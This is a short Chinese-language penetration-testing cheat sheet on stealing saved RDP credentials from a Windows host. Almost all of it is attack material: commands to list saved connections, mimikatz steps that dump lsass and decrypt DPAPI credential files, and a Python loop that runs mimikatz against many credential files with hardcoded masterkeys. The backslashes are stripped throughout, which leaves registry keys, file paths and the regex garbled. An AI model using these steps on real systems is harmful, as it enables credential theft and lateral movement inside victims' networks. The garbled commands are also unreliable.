内网渗透-获取本地RDP密码
获取RDP 连接记录:
reg query "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /s
cmdkey /list 查看保存凭据信息
本机脱取:
mimikatz # privilege::debug
mimikatz # dpapi::cred /in:C:UsersAdministratorAppDataLocalMicrosoftCredentialsxx
离线脱取:
Procdump 下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
dir /a %userprofile%AppDataLocalMicrosoftCredentials* //查看凭据文件
Masterkey:
Processdump lsass.exe 进程 mimikatz 加载,获取masterkey
Sekurlsa::dump “lsass.dmp”
Sekurlsa::dpapi 获取masterkey
利用mimikatz 设置指定的masterkey,进行凭据文件解密
mimikatz 配合python 自动脱凭据 //最主要在凭据文件比较多的时候会用到。
import os import re for dd in os.listdir("C:\Users\admin\Desktop\mimkatz\x64\pinju\"): key=['a8e9e1d02d5bdebd939faa1dd556f428ac9cfc19d68c8e758b2dd2364059c07a7cf8e8cd430d63a7deb628244a96cc52d7e51b03b7ccda5fec461c987c5b0828','8233e316134ace93c883bdf9b01dbc32d49d6d6e91bc1af0c7960247ff7c551fcd706711352d7a398d9e2fa9ab7e786c57fd81404201a1b990d26ee25686a625'] for i in key: os.system(('mimikatz.exe "dpapi::cred /in:C:\Users\admin\Desktop\mimkatz\x64\pinju\{} /masterkey:{}" exit >1n.txt').format(dd,i)) f=open('1n.txt','r',encoding='UTF-8') res=f.read() if 'TERMSRV' in res: name=re.compile(r'(?<![.d])(?:d{1,3}.){3}d{1,3}(?![.d])') names=name.findall(res) print(names) d=open('./res/'+names[0]+'.txt','a+') d.write(res) d.close() f.close()
mimikatz 在用户sessions 下
读取cmdkey 凭据
privilege::debug
vault::cred /patch
------------